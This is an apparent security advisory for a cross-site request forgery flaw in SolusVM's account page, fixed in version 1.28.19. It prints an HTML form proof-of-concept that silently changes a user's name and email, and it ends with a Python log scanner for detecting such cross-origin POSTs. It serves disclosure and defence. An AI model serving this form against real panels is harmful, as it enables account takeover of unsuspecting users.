Applicable to:
- SolusVM
Situation
Using the HTML code given below, it is possible to change a user's account details.
<html>
<body>
<form method="POST" action="https://10.67.89.116/account.php">
<input type="hidden" name="firstname" value="custom_first_name"/>
<input type="hidden" name="lastname" value="custom_lastname_name"/>
<input type="hidden" name="emailaddress" value="custom@mail"/>
<input type="hidden" name="company" value=""/>
<input type="hidden" name="language" value="English"/>
<input type="hidden" name="loginalert" value="on"/>
<input type="hidden" name="updatesettings" value="Update+Settings"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Impact
- Personal information theft: The attacker can gain access to the victim's personal information, such as name, email address, and sensitive financial information.
- Reputation damage: The attacker may use the victim's account to perform malicious actions, such as sending spam emails, posting inappropriate content, or making unauthorized purchases. This can result in damage to the victim's reputation and their relationship with the targeted website.
- Financial loss: If the attacker is able to make unauthorized purchases or access the victim's financial information, they may be able to cause financial losses for the victim.
Call to action
This bug has ID #SVM-3692 and was fixed in SolusVM version 1.28.19.
Update SolusVM to the latest mainline version.
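An added example, not part of the original article or SolusVM's own code: a Python check over web-server access logs for POST requests to /account.php whose Referer does not belong to the panel, which is the pattern a form like the one above produces when it is served from another site. The combined log format, the use of 10.67.89.116 as the panel host, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: Apache/nginx "combined" log format, which records the Referer.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify_referer(referer, panel_hosts):
    """Return 'same-origin', 'missing' or 'cross-origin' for a Referer value."""
    if referer in ("", "-"):
        return "missing"
    try:
        host = urlsplit(referer).hostname
    except ValueError:
        host = None
    if host is None:
        return "cross-origin"  # unparsable value, treat as foreign
    return "same-origin" if host.lower() in panel_hosts else "cross-origin"

def find_suspect_posts(lines, panel_hosts, path="/account.php"):
    """Yield (timestamp, client_ip, verdict, referer) for POSTs to `path`
    that did not come from a page served by the panel itself."""
    panel_hosts = {h.lower() for h in panel_hosts}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != path:
            continue
        verdict = classify_referer(m["referer"], panel_hosts)
        if verdict != "same-origin":
            yield m["ts"], m["ip"], verdict, m["referer"]

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2023:10:01:02 +0000] "POST /account.php HTTP/1.1" 200 512 "https://10.67.89.116/account.php" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2023:10:05:40 +0000] "POST /account.php HTTP/1.1" 200 512 "https://forum.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2023:10:07:11 +0000] "POST /account.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2023:10:08:00 +0000] "GET /account.php HTTP/1.1" 200 4096 "https://forum.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG, {"10.67.89.116"}):
        print(*hit, sep="  ")
```

A "missing" verdict is weaker evidence than "cross-origin", since browsers and privacy tools can suppress the Referer on legitimate requests; correlate those hits with account changes the user did not make.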